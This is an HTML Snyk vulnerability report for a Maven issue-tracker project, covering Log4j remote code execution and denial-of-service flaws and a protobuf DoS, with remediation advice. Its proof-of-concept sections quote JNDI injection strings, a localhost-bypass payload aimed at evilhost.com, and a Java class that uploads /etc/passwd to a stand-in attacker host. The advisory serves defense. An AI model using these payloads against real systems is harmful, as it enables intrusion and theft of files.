<!DOCTYPE html>
<html lang="en">

<head>
  <meta http-equiv="Content-type" content="text/html; charset=utf-8">
  <meta http-equiv="Content-Language" content="en-us">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <title>Snyk test report</title>
  <meta name="description" content="9 known vulnerabilities found in 9 vulnerable dependency paths.">
  <base target="_blank">
  <link rel="icon" type="image/png" href="https://res.cloudinary.com/snyk/image/upload/v1468845142/favicon/favicon.png"
    sizes="194x194">
  <link rel="shortcut icon" href="https://res.cloudinary.com/snyk/image/upload/v1468845142/favicon/favicon.ico">
  <style type="text/css">
  
    body {
      -moz-font-feature-settings: "pnum";
      -webkit-font-feature-settings: "pnum";
      font-variant-numeric: proportional-nums;
      display: flex;
      flex-direction: column;
      font-feature-settings: "pnum";
      font-size: 100%;
      line-height: 1.5;
      min-height: 100vh;
      -webkit-text-size-adjust: 100%;
      margin: 0;
      padding: 0;
      background-color: #F5F5F5;
      font-family: 'Arial', 'Helvetica', Calibri, sans-serif;
    }
  
    h1,
    h2,
    h3,
    h4,
    h5,
    h6 {
      font-weight: 500;
    }
  
    a,
    a:link,
    a:visited {
      border-bottom: 1px solid #4b45a9;
      text-decoration: none;
      color: #4b45a9;
    }
  
    a:hover,
    a:focus,
    a:active {
      border-bottom: 1px solid #4b45a9;
    }
  
    hr {
      border: none;
      margin: 1em 0;
      border-top: 1px solid #c5c5c5;
    }
  
    ul {
      padding: 0 1em;
      margin: 1em 0;
    }
  
    code {
      background-color: #EEE;
      color: #333;
      padding: 0.25em 0.5em;
      border-radius: 0.25em;
    }
  
    pre {
      background-color: #333;
      font-family: monospace;
      padding: 0.5em 1em 0.75em;
      border-radius: 0.25em;
      font-size: 14px;
    }
  
    pre code {
      padding: 0;
      background-color: transparent;
      color: #fff;
    }
  
    a code {
      border-radius: .125rem .125rem 0 0;
      padding-bottom: 0;
      color: #4b45a9;
    }
  
    a[href^="http://"]:after,
    a[href^="https://"]:after {
      background-image: linear-gradient(transparent,transparent),url("data:image/svg+xml,%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%20viewBox%3D%220%200%20112%20109%22%3E%3Cg%20id%3D%22Page-1%22%20fill%3D%22none%22%20fill-rule%3D%22evenodd%22%3E%3Cg%20id%3D%22link-external%22%3E%3Cg%20id%3D%22arrow%22%3E%3Cpath%20id%3D%22Line%22%20stroke%3D%22%234B45A9%22%20stroke-width%3D%2215%22%20d%3D%22M88.5%2021l-43%2042.5%22%20stroke-linecap%3D%22square%22%2F%3E%3Cpath%20id%3D%22Triangle%22%20fill%3D%22%234B45A9%22%20d%3D%22M111.2%200v50L61%200z%22%2F%3E%3C%2Fg%3E%3Cpath%20id%3D%22square%22%20fill%3D%22%234B45A9%22%20d%3D%22M66%2015H0v94h94V44L79%2059v35H15V30h36z%22%2F%3E%3C%2Fg%3E%3C%2Fg%3E%3C%2Fsvg%3E");
      background-repeat: no-repeat;
      background-size: .75rem;
      content: "";
      display: inline-block;
      height: .75rem;
      margin-left: .25rem;
      width: .75rem;
    }
  
  
  /* Layout */
  
    [class*=layout-container] {
      margin: 0 auto;
      max-width: 71.25em;
      padding: 1.9em 1.3em;
      position: relative;
    }
    .layout-container--short {
      padding-top: 0;
      padding-bottom: 0;
      max-width: 48.75em;
    }
  
    .layout-container--short:after {
      display: block;
      content: "";
      clear: both;
    }
  
  /* Header */
  
    .header {
      padding-bottom: 1px;
    }
  
    .paths {
      margin-left: 8px;
    }
    .header-wrap {
      display: flex;
      flex-direction: row;
      justify-content: space-between;
      padding-top: 2em;
    }
    .project__header {
      background-color: #4b45a9;
      color: #fff;
      margin-bottom: -1px;
      padding-top: 1em;
      padding-bottom: 0.25em;
      border-bottom: 2px solid #BBB;
    }
  
    .project__header__title {
      overflow-wrap: break-word;
      word-wrap: break-word;
      word-break: break-all;
      margin-bottom: .1em;
      margin-top: 0;
    }
  
    .timestamp {
      float: right;
      clear: none;
      margin-bottom: 0;
    }
  
    .meta-counts {
      clear: both;
      display: block;
      flex-wrap: wrap;
      justify-content: space-between;
      margin: 0 0 1.5em;
      color: #fff;
      clear: both;
      font-size: 1.1em;
    }
  
    .meta-count {
      display: block;
      flex-basis: 100%;
      margin: 0 1em 1em 0;
      float: left;
      padding-right: 1em;
      border-right: 2px solid #fff;
    }
  
    .meta-count:last-child {
      border-right: 0;
      padding-right: 0;
      margin-right: 0;
    }
  
  /* Card */
  
    .card {
      background-color: #fff;
      border: 1px solid #c5c5c5;
      border-radius: .25rem;
      margin: 0 0 2em 0;
      position: relative;
      min-height: 40px;
      padding: 1.5em;
    }
  
    .card .label {
      background-color: #767676;
      border: 2px solid #767676;
      color: white;
      padding: 0.25rem 0.75rem;
      font-size: 0.875rem;
      text-transform: uppercase;
      display: inline-block;
      margin: 0;
      border-radius: 0.25rem;
    }
  
    .card .label__text {
      vertical-align: text-top;
        font-weight: bold;
    }
  
    .card .label--critical {
      background-color: #AB1A1A;
      border-color: #AB1A1A;
    }
  
    .card .label--high {
      background-color: #CE5019;
      border-color: #CE5019;
    }
  
    .card .label--medium {
      background-color: #D68000;
      border-color: #D68000;
    }
  
    .card .label--low {
      background-color: #88879E;
      border-color: #88879E;
    }
  
    .severity--low {
      border-color: #88879E;
    }
  
    .severity--medium {
      border-color: #D68000;
    }
  
    .severity--high {
      border-color: #CE5019;
    }
  
    .severity--critical {
      border-color: #AB1A1A;
    }
  
    .card--vuln {
      padding-top: 4em;
    }
  
    .card--vuln .label {
      left: 0;
      position: absolute;
      top: 1.1em;
      padding-left: 1.9em;
      padding-right: 1.9em;
      border-radius: 0 0.25rem 0.25rem 0;
    }
  
    .card--vuln .card__section h2 {
      font-size: 22px;
      margin-bottom: 0.5em;
    }
  
    .card--vuln .card__section p {
      margin: 0 0 0.5em 0;
    }
  
    .card--vuln .card__meta {
      padding: 0 0 0 1em;
      margin: 0;
      font-size: 1.1em;
    }
  
    .card .card__meta__paths {
      font-size: 0.9em;
    }
  
    .card--vuln .card__title {
      font-size: 28px;
      margin-top: 0;
    }
  
    .card--vuln .card__cta p {
      margin: 0;
      text-align: right;
    }
  
    .source-panel {
      clear: both;
      display: flex;
      justify-content: flex-start;
      flex-direction: column;
      align-items: flex-start;
      padding: 0.5em 0;
      width: fit-content;
    }
  
  
  
  </style>
  <style type="text/css">
    .metatable {
      text-size-adjust: 100%;
      -webkit-font-smoothing: antialiased;
      -webkit-box-direction: normal;
      color: inherit;
      font-feature-settings: "pnum";
      box-sizing: border-box;
      background: transparent;
      border: 0;
      font: inherit;
      font-size: 100%;
      margin: 0;
      outline: none;
      padding: 0;
      text-align: left;
      text-decoration: none;
      vertical-align: baseline;
      z-index: auto;
      margin-top: 12px;
      border-collapse: collapse;
      border-spacing: 0;
      font-variant-numeric: tabular-nums;
      max-width: 51.75em;
    }
  
    tbody {
      text-size-adjust: 100%;
      -webkit-font-smoothing: antialiased;
      -webkit-box-direction: normal;
      color: inherit;
      font-feature-settings: "pnum";
      border-collapse: collapse;
      border-spacing: 0;
      box-sizing: border-box;
      background: transparent;
      border: 0;
      font: inherit;
      font-size: 100%;
      margin: 0;
      outline: none;
      padding: 0;
      text-align: left;
      text-decoration: none;
      vertical-align: baseline;
      z-index: auto;
      display: flex;
      flex-wrap: wrap;
    }
  
    .meta-row {
      text-size-adjust: 100%;
      -webkit-font-smoothing: antialiased;
      -webkit-box-direction: normal;
      color: inherit;
      font-feature-settings: "pnum";
      border-collapse: collapse;
      border-spacing: 0;
      box-sizing: border-box;
      background: transparent;
      border: 0;
      font: inherit;
      font-size: 100%;
      outline: none;
      text-align: left;
      text-decoration: none;
      vertical-align: baseline;
      z-index: auto;
      display: flex;
      align-items: start;
      border-top: 1px solid #d3d3d9;
      padding: 8px 0 0 0;
      border-bottom: none;
      margin: 8px;
      width: 47.75%;
    }
  
    .meta-row-label {
      text-size-adjust: 100%;
      -webkit-font-smoothing: antialiased;
      -webkit-box-direction: normal;
      font-feature-settings: "pnum";
      border-collapse: collapse;
      border-spacing: 0;
      color: #4c4a73;
      box-sizing: border-box;
      background: transparent;
      border: 0;
      font: inherit;
      margin: 0;
      outline: none;
      text-decoration: none;
      z-index: auto;
      align-self: start;
      flex: 1;
      font-size: 1rem;
      line-height: 1.5rem;
      padding: 0;
      text-align: left;
      vertical-align: top;
      text-transform: none;
      letter-spacing: 0;
    }
  
    .meta-row-value {
      text-size-adjust: 100%;
      -webkit-font-smoothing: antialiased;
      -webkit-box-direction: normal;
      color: inherit;
      font-feature-settings: "pnum";
      border-collapse: collapse;
      border-spacing: 0;
      word-break: break-word;
      box-sizing: border-box;
      background: transparent;
      border: 0;
      font: inherit;
      font-size: 100%;
      margin: 0;
      outline: none;
      padding: 0;
      text-align: right;
      text-decoration: none;
      vertical-align: baseline;
      z-index: auto;
    }
  </style>
</head>

<body class="section-projects">
  <main class="layout-stacked">
        <div class="layout-stacked__header header">
          <header class="project__header">
            <div class="layout-container">
              <a class="brand" href="https://snyk.io" title="Snyk">
                <svg width="68px" height="35px" viewBox="0 0 68 35" version="1.1" xmlns="http://www.w3.org/2000/svg" role="img">
                  <title>Snyk - Open Source Security</title>
                  <g stroke="none" stroke-width="1" fill="none" fill-rule="evenodd">
                    <g fill="#fff">
                      <path d="M5.732,27.278 C3.445,27.278 1.589,26.885 0,26.124 L0.483,22.472 C2.163,23.296 4.056,23.689 5.643,23.689 C6.801,23.689 7.563,23.295 7.563,22.599 C7.563,20.594 0.333,21.076 0.333,15.839 C0.333,12.491 3.407,10.729 7.259,10.729 C9.179,10.729 11.161,11.249 12.444,11.704 L11.924,15.294 C10.577,14.774 8.747,14.291 7.222,14.291 C6.282,14.291 5.518,14.621 5.518,15.231 C5.518,17.208 12.903,16.815 12.903,21.925 C12.903,25.325 9.877,27.277 5.733,27.277 L5.732,27.278 Z M25.726,26.936 L25.726,17.894 C25.726,15.827 24.811,14.85 23.069,14.85 C22.219,14.85 21.329,15.09 20.719,15.46 L20.719,26.936 L15.352,26.936 L15.352,11.262 L20.602,10.83 L20.474,13.392 L20.652,13.392 C21.784,11.87 23.702,10.716 25.992,10.716 C28.736,10.716 31.112,12.416 31.112,16.436 L31.112,26.936 L25.724,26.936 L25.726,26.936 Z M61.175,26.936 L56.879,19.479 L56.446,19.479 L56.446,26.935 L51.082,26.935 L51.082,8.37 L56.447,0 L56.447,17.323 C57.515,16.017 61.112,11.059 61.112,11.059 L67.732,11.059 L61.454,17.689 L67.949,26.95 L61.175,26.95 L61.175,26.938 L61.175,26.936 Z M44.13,11.11 L41.93,18.262 C41.5,19.606 41.08,22.079 41.08,22.079 C41.08,22.079 40.75,19.516 40.292,18.172 L37.94,11.108 L31.928,11.108 L38.462,26.935 C37.572,29.04 36.199,30.815 34.369,30.815 C34.039,30.815 33.709,30.802 33.389,30.765 L31.255,34.061 C31.928,34.441 33.212,34.835 34.737,34.835 C38.703,34.835 41.359,31.627 43.215,26.885 L49.443,11.108 L44.132,11.108 L44.13,11.11 Z"></path>
                    </g>
                  </g>
                </svg>
              </a>
              <div class="header-wrap">
                  <h1 class="project__header__title">Snyk test report</h1>
    
                <p class="timestamp">February 22nd 2022, 2:17:06 am</p>
              </div>
              <div class="source-panel">
                <span>Scanned the following path:</span>
                <ul>
                  <li class="paths">/var/lib/jenkins/workspace/issue-tracker-pipeline (maven)</li>
                </ul>
              </div>
    
              <div class="meta-counts">
                <div class="meta-count"><span>9</span> <span>known vulnerabilities</span></div>
                <div class="meta-count"><span>9 vulnerable dependency paths</span></div>
                <div class="meta-count"><span>20</span> <span>dependencies</span></div>
              </div><!-- .meta-counts -->
            </div><!-- .layout-container--short -->
          </header><!-- .project__header -->
        </div><!-- .layout-stacked__header -->
      <section class="layout-container">
          <table class="metatable">
              <tbody>
              <tr class="meta-row"><th class="meta-row-label">Project</th> <td class="meta-row-value">edu.mac.issuetracker:issue-tracker</td></tr>
              <tr class="meta-row"><th class="meta-row-label">Path</th> <td class="meta-row-value">/var/lib/jenkins/workspace/issue-tracker-pipeline</td></tr>
              <tr class="meta-row"><th class="meta-row-label">Package Manager</th> <td class="meta-row-value">maven</td></tr>
              <tr class="meta-row"><th class="meta-row-label">Manifest</th> <td class="meta-row-value">pom.xml</td></tr>
              </tbody>
          </table>
      </section>
    <div class="layout-container" style="padding-top: 35px;">
      <div class="cards--vuln filter--patch filter--ignore">
        <div class="card card--vuln  disclosure--not-new severity--critical" data-snyk-test="critical">
            <h2 class="card__title">Remote Code Execution (RCE)</h2>
            <div class="card__section">
        
                <div class="label label--critical">
                    <span class="label__text">critical severity</span>
                </div>
        
                <hr/>
        
                <ul class="card__meta">
                    <li class="card__meta__item">
                        Package Manager: maven
                    </li>
                    <li class="card__meta__item">
                            Vulnerable module:
        
                            org.apache.logging.log4j:log4j-core
                    </li>
        
                    <li class="card__meta__item">Introduced through:
        
        
                                    edu.mac.issuetracker:issue-tracker@0.1, edu.mac.issuetracker:issue-tracker-ear@0.1 and others
                    </li>
                </ul>
        
                <hr/>
        
        
                        <h3 class="card__section__title">Detailed paths</h3>
        
                    <ul class="card__meta__paths">
                                <li>
                                <span class="list-paths__item__introduced"><em>Introduced through</em>:
                                        edu.mac.issuetracker:issue-tracker@0.1
                                         <span class="list-paths__item__arrow">›</span> 
                                        edu.mac.issuetracker:issue-tracker-ear@0.1
                                         <span class="list-paths__item__arrow">›</span> 
                                        edu.mac.issuetracker.issue:issue-tracker-issue-ejb@0.1
                                         <span class="list-paths__item__arrow">›</span> 
                                        org.apache.logging.log4j:log4j-core@2.14.1
                                        
                                </span>
        
                            </li>
                    </ul><!-- .list-paths -->
        
            </div><!-- .card__section -->
        
              <hr/>
              <!-- Overview -->
              <h2 id="overview">Overview</h2>
        <p><a href="http://logging.apache.org/log4j/1.2/">org.apache.logging.log4j:log4j-core</a> is a logging library for Java.</p>
        <p>Affected versions of this package are vulnerable to Remote Code Execution (RCE).
        Apache Log4j2 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.</p>
        <p>From log4j 2.15.0, JNDI LDAP endpoints are restricted to localhost by default.</p>
        <h2 id="poc">PoC</h2>
        <p>When an application uses log4j to log user input, an attacker can exploit this vulnerability, by supplying a malicious string that the application logs - for example,  <code>${jndi:ldap://someurl/Evil}</code>. This causes the application to execute a malicious class supplied by an attacker’s LDAP server (<code>someurl/Evil</code> in this example).</p>
        <p>For example, the vulnerability can be used to inject this malicious class into an application:</p>
        <pre><code class="language-java">public class Evil implements ObjectFactory  {
           @Override
           public Object getObjectInstance (Object obj, Name name, Context nameCtx, Hashtable&lt;?, ?&gt; environment)  throws Exception {
               Runtime.getRuntime().exec(&quot;curl -F &#39;file=@/etc/passw‍đ&#39; https://someurl/upload&quot;);
               return  null;
           }
        }
        </code></pre>
        <p>This causes the application to disclose the <code>etc/passwd</code> file on the system, and send it to a remote attacker.</p>
        <h2 id="further-remediation-options">Further Remediation Options</h2>
        <p>If upgrading the version is not possible, we strongly recommend to mitigate the vulnerability using one of these methods:</p>
        <ul>
        <li>Remove <code>JndiLookup.class</code> from the class path (i.e: <code>zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class</code>. While not pertinent to log4shell, consider also removing <code>JndiManager</code>, <code>JMSAppender</code> and <code>SMTPAppender</code> if you are not using them, as there are unconfirmed reports they could be leveraged in similar attacks in the future.</li>
        <li>Partial mitigation: disable lookups via system properties or environmental variables. If you use log4j &gt;=2.10.0, you can set the system property <code>LOG4J_FORMAT_MSG_NO_LOOKUPS</code> or the environmental variable <code>Dlog4j2.formatMsgNoLookups</code> to <code>true</code>. (RCE is possible in some non-default Pattern Layout configurations that use a Context Lookup or a Thread Context Map pattern.)</li>
        </ul>
        <p><br>Upgrading your JDK versions is not enough to mitigate this vulnerability in all circumstances, as it was proven that setting the <code>com.sun.jndi.ldap.object.trustURLCodebase</code> property to <code>false</code> is not enough.
        <br>For more remediation advice, please visit the <a href="https://snyk.io/blog/log4shell-remediation-cheat-sheet/">Log4j Remediation Cheat Sheet</a> post.</p>
        <p><strong>Note</strong>: <code>org.apache.logging.log4j:log4j-api</code> was originally deemed vulnerable, but Apache maintainers have since <a href="https://issues.apache.org/jira/browse/LOG4J2-3201">clarified</a> that this only affects <code>org.apache.logging.log4j:log4j-core</code>.</p>
        <h2 id="remediation">Remediation</h2>
        <p>Upgrade <code>org.apache.logging.log4j:log4j-core</code> to version 2.3.1, 2.12.2, 2.15.0 or higher.</p>
        <p>Use <a href="https://snyk.io/blog/find-fix-log4shell-quickly-snyk/">this guide</a> to scan your projects for the Log4Shell vulnerability.</p>
        <h2 id="references">References</h2>
        <ul>
        <li><p><a href="https://issues.apache.org/jira/browse/LOG4J2-3198">Apache Jira Issues</a></p>
        </li>
        <li><p><a href="https://issues.apache.org/jira/browse/LOG4J2-3201">Apache Jira Issues</a></p>
        </li>
        <li><p><a href="https://logging.apache.org/log4j/2.x/security.html">Apache Security Advisory</a></p>
        </li>
        <li><p><a href="https://github.com/apache/logging-log4j2/pull/608">GitHub PR</a></p>
        </li>
        <li><p><a href="https://github.com/Kirill89/log4shell-vulnerable-server">PoC</a></p>
        </li>
        <li><p><a href="https://snyk.io/blog/log4j-rce-log4shell-vulnerability-cve-2021-4428/">Snyk Blog and Vulnerability Breakdown</a></p>
        </li>
        </ul>
        
              <hr/>
        
            <div class="cta card__cta">
                <p><a href="https://snyk.io/vuln/SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2314720">More about this vulnerability</a></p>
            </div>
        
        </div><!-- .card -->
        <div class="card card--vuln  disclosure--not-new severity--critical" data-snyk-test="critical">
            <h2 class="card__title">Remote Code Execution (RCE)</h2>
            <div class="card__section">
        
                <div class="label label--critical">
                    <span class="label__text">critical severity</span>
                </div>
        
                <hr/>
        
                <ul class="card__meta">
                    <li class="card__meta__item">
                        Package Manager: maven
                    </li>
                    <li class="card__meta__item">
                            Vulnerable module:
        
                            org.apache.logging.log4j:log4j-core
                    </li>
        
                    <li class="card__meta__item">Introduced through:
        
        
                                    edu.mac.issuetracker:issue-tracker@0.1, edu.mac.issuetracker:issue-tracker-ear@0.1 and others
                    </li>
                </ul>
        
                <hr/>
        
        
                        <h3 class="card__section__title">Detailed paths</h3>
        
                    <ul class="card__meta__paths">
                                <li>
                                <span class="list-paths__item__introduced"><em>Introduced through</em>:
                                        edu.mac.issuetracker:issue-tracker@0.1
                                         <span class="list-paths__item__arrow">›</span> 
                                        edu.mac.issuetracker:issue-tracker-ear@0.1
                                         <span class="list-paths__item__arrow">›</span> 
                                        edu.mac.issuetracker.issue:issue-tracker-issue-ejb@0.1
                                         <span class="list-paths__item__arrow">›</span> 
                                        org.apache.logging.log4j:log4j-core@2.14.1
                                        
                                </span>
        
                            </li>
                    </ul><!-- .list-paths -->
        
            </div><!-- .card__section -->
        
              <hr/>
              <!-- Overview -->
              <h2 id="overview">Overview</h2>
        <p><a href="http://logging.apache.org/log4j/1.2/">org.apache.logging.log4j:log4j-core</a> is a logging library for Java.</p>
        <p>Affected versions of this package are vulnerable to Remote Code Execution (RCE) if one of the following conditions is met:</p>
        <ol>
        <li>Logging configuration explicitly enables lookups – either by default (if using a version lower than 2.15.0) or manually by using <code>%m{lookups}</code> as <code>formatMsgNoLookups</code> is switched on by default as of version 2.15.0.</li>
        <li>Or uses a non-default Pattern Layout with Context Lookup where attackers can control input data via Thread Context Map (MDC),</li>
        <li>Or uses <code>Logger.printf(&quot;%s&quot;, userInput)</code> function where attackers can control the userInput variable.</li>
        </ol>
        <p>A malicious actor is able to bypass the mitigation implemented in version 2.15.0 that limits JNDI lookups to localhost only: <code>${jndi:ldap://127.0.0.1#evilhost.com:1389/a}</code>.</p>
        <p>We recommend updating to version 2.16.0 which completely disables JNDI lookups by default. If upgrading is not an option, this issue can be mitigated in prior releases by removing the <code>JndiLookup</code> class from the classpath (example: <code>zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class</code>).</p>
        <h3 id="poc">PoC</h3>
        <p>In config:</p>
        <pre><code>&lt;pattern&gt;%d %p %c{1.} [%t] $${ctx:loginId} %m%n&lt;/pattern&gt;
        </code></pre>
        <p>In code:</p>
        <pre><code class="language-java">ThreadContext.put(&quot;loginId&quot;, UserControlledInput);
        </code></pre>
        <h3 id="history">History</h3>
        <p>This vulnerability was previously assigned a CVSS score of 3.7 (Low), and the impact was believed to be Denial of Service (DoS).</p>
        <p>Furthermore, the advisory previously mentioned Thread Context Map patterns (%X, %mdc, or %MDC) as being vulnerable to this issue, but that has since been proven wrong.</p>
        <p>On December 17, 2021 new information came to light, demonstrating that an Arbitrary Code Execution vulnerability still exists in version 2.15.0 of Log4j due to a bypass to the localhost-only lookup mechanism.</p>
        <h2 id="remediation">Remediation</h2>
        <p>Upgrade <code>org.apache.logging.log4j:log4j-core</code> to version 2.3.1, 2.12.2, 2.16.0 or higher.</p>
        <h2 id="references">References</h2>
        <ul>
        <li><a href="https://lists.apache.org/thread/83y7dx5xvn3h5290q1twn16tltolv88f">Apache Pony Mail</a></li>
        <li><a href="https://logging.apache.org/log4j/2.x/security.html">Apache Security Page</a></li>
        <li><a href="https://twitter.com/marcioalm/status/1471740771581652995">Twitter Post</a></li>
        </ul>
        
              <hr/>
        
            <div class="cta card__cta">
                <p><a href="https://snyk.io/vuln/SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2320014">More about this vulnerability</a></p>
            </div>
        
        </div><!-- .card -->
        <div class="card card--vuln  disclosure--not-new severity--high" data-snyk-test="high">
            <h2 class="card__title">Denial of Service (DoS)</h2>
            <div class="card__section">
        
                <div class="label label--high">
                    <span class="label__text">high severity</span>
                </div>
        
                <hr/>
        
                <ul class="card__meta">
                    <li class="card__meta__item">
                        Package Manager: maven
                    </li>
                    <li class="card__meta__item">
                            Vulnerable module:
        
                            org.apache.logging.log4j:log4j-core
                    </li>
        
                    <li class="card__meta__item">Introduced through:
        
        
                                    edu.mac.issuetracker:issue-tracker@0.1, edu.mac.issuetracker:issue-tracker-ear@0.1 and others
                    </li>
                </ul>
        
                <hr/>
        
        
                        <h3 class="card__section__title">Detailed paths</h3>
        
                    <ul class="card__meta__paths">
                                <li>
                                <span class="list-paths__item__introduced"><em>Introduced through</em>:
                                        edu.mac.issuetracker:issue-tracker@0.1
                                         <span class="list-paths__item__arrow">›</span> 
                                        edu.mac.issuetracker:issue-tracker-ear@0.1
                                         <span class="list-paths__item__arrow">›</span> 
                                        edu.mac.issuetracker.issue:issue-tracker-issue-ejb@0.1
                                         <span class="list-paths__item__arrow">›</span> 
                                        org.apache.logging.log4j:log4j-core@2.14.1
                                        
                                </span>
        
                            </li>
                    </ul><!-- .list-paths -->
        
            </div><!-- .card__section -->
        
              <hr/>
              <!-- Overview -->
              <h2 id="overview">Overview</h2>
        <p><a href="http://logging.apache.org/log4j/1.2/">org.apache.logging.log4j:log4j-core</a> is a logging library for Java.</p>
        <p>Affected versions of this package are vulnerable to Denial of Service (DoS). Does not protect against uncontrolled recursion from self-referential lookups. </p>
        <p>When the logging configuration uses a non-default Pattern Layout with a Context Lookup (for example, <code>$${ctx:loginId}</code>), attackers with control over Thread Context Map (MDC) input data can craft malicious input data that contains a recursive lookup, resulting in a <code>StackOverflowError</code> that will terminate the process.</p>
        <h3 id="poc">PoC</h3>
        <p>In <code>log4j.properties</code>:</p>
        <pre><code class="language-java">appender.console.type = Console
        appender.console.name = console
        appender.console.layout.type = PatternLayout
        appender.console.layout.pattern = !${ctx:test}! %m%n
        rootLogger.level = ALL
        rootLogger.appenderRef.file.ref = console
        </code></pre>
        <p>In <code>Main.java</code>:</p>
        <pre><code class="language-java">ThreadContext.put(&quot;test&quot;, &quot;${::-${ctx:test}}&quot;);
        logger.error(&quot;boom&quot;); // Will not be logged
        </code></pre>
        <h2 id="details">Details</h2>
        <p>Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.</p>
        <p>Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.</p>
        <p>One popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.</p>
        <p>When it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.</p>
        <p>Two common types of DoS vulnerabilities:</p>
        <ul>
        <li><p>High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, <a href="SNYK-JAVA-COMMONSFILEUPLOAD-30082">commons-fileupload:commons-fileupload</a>.</p>
        </li>
        <li><p>Crash - An attacker sending crafted requests that could cause the system to crash. For Example,  <a href="https://snyk.io/vuln/npm:ws:20171108">npm <code>ws</code> package</a></p>
        </li>
        </ul>
        <h2 id="remediation">Remediation</h2>
        <p>Upgrade <code>org.apache.logging.log4j:log4j-core</code> to version 2.3.1, 2.12.3, 2.17.0 or higher.</p>
        <h2 id="references">References</h2>
        <ul>
        <li><a href="https://logging.apache.org/log4j/2.x/security.html">Apache Security</a></li>
        <li><a href="https://issues.apache.org/jira/browse/LOG4J2-3230">JIRA Issue</a></li>
        </ul>
        
              <hr/>
        
            <div class="cta card__cta">
                <p><a href="https://snyk.io/vuln/SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2321524">More about this vulnerability</a></p>
            </div>
        
        </div><!-- .card -->
        <div class="card card--vuln  disclosure--not-new severity--high" data-snyk-test="high">
            <h2 class="card__title">Denial of Service (DoS)</h2>
            <div class="card__section">
        
                <div class="label label--high">
                    <span class="label__text">high severity</span>
                </div>
        
                <hr/>
        
                <ul class="card__meta">
                    <li class="card__meta__item">
                        Package Manager: maven
                    </li>
                    <li class="card__meta__item">
                            Vulnerable module:
        
                            com.google.protobuf:protobuf-java
                    </li>
        
                    <li class="card__meta__item">Introduced through:
        
        
                                    edu.mac.issuetracker:issue-tracker@0.1, edu.mac.issuetracker:issue-tracker-ear@0.1 and others
                    </li>
                </ul>
        
                <hr/>
        
        
                        <h3 class="card__section__title">Detailed paths</h3>
        
                    <ul class="card__meta__paths">
                                <li>
                                <span class="list-paths__item__introduced"><em>Introduced through</em>:
                                        edu.mac.issuetracker:issue-tracker@0.1
                                         <span class="list-paths__item__arrow">›</span> 
                                        edu.mac.issuetracker:issue-tracker-ear@0.1
                                         <span class="list-paths__item__arrow">›</span> 
                                        edu.mac.issuetracker.staff:issue-tracker-staff-ejb@0.1
                                         <span class="list-paths__item__arrow">›</span> 
                                        mysql:mysql-connector-java@8.0.26
                                         <span class="list-paths__item__arrow">›</span> 
                                        com.google.protobuf:protobuf-java@3.11.4
                                        
                                </span>
        
                            </li>
                    </ul><!-- .list-paths -->
        
            </div><!-- .card__section -->
        
              <hr/>
              <!-- Overview -->
              <h2 id="overview">Overview</h2>
        <p><a href="https://mvnrepository.com/artifact/com.google.protobuf/protobuf-java">com.google.protobuf:protobuf-java</a> is a Google&#39;s language-neutral, platform-neutral, extensible mechanism for serializing structured data.</p>
        <p>Affected versions of this package are vulnerable to Denial of Service (DoS). An issue in protobuf-java allowed the interleaving of <code>com.google.protobuf.UnknownFieldSet</code> fields in such a way that would be processed out of order. A small malicious payload can occupy the parser for several minutes by creating large numbers of short-lived objects that cause frequent, repeated pauses.</p>
        <h2 id="details">Details</h2>
        <p>Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.</p>
        <p>Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.</p>
        <p>One popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.</p>
        <p>When it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.</p>
        <p>Two common types of DoS vulnerabilities:</p>
        <ul>
        <li><p>High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, <a href="SNYK-JAVA-COMMONSFILEUPLOAD-30082">commons-fileupload:commons-fileupload</a>.</p>
        </li>
        <li><p>Crash - An attacker sending crafted requests that could cause the system to crash. For Example,  <a href="https://snyk.io/vuln/npm:ws:20171108">npm <code>ws</code> package</a></p>
        </li>
        </ul>
        <h2 id="remediation">Remediation</h2>
        <p>Upgrade <code>com.google.protobuf:protobuf-java</code> to version 3.19.2, 3.18.2, 3.16.1 or higher.</p>
        <h2 id="references">References</h2>
        <ul>
        <li><a href="https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=39330">Chromium Bugs</a></li>
        <li><a href="https://cloud.google.com/support/bulletins#gcp-2022-001">Google Cloud Security Bulletin</a></li>
        </ul>
        
              <hr/>
        
            <div class="cta card__cta">
                <p><a href="https://snyk.io/vuln/SNYK-JAVA-COMGOOGLEPROTOBUF-2331703">More about this vulnerability</a></p>
            </div>
        
        </div><!-- .card -->
        <div class="card card--vuln  disclosure--not-new severity--medium" data-snyk-test="medium">
            <h2 class="card__title">Arbitrary Code Execution</h2>
            <div class="card__section">
        
                <div class="label label--medium">
                    <span class="label__text">medium severity</span>
                </div>
        
                <hr/>
        
                <ul class="card__meta">
                    <li class="card__meta__item">
                        Package Manager: maven
                    </li>
                    <li class="card__meta__item">
                            Vulnerable module:
        
                            org.apache.logging.log4j:log4j-core
                    </li>
        
                    <li class="card__meta__item">Introduced through:
        
        
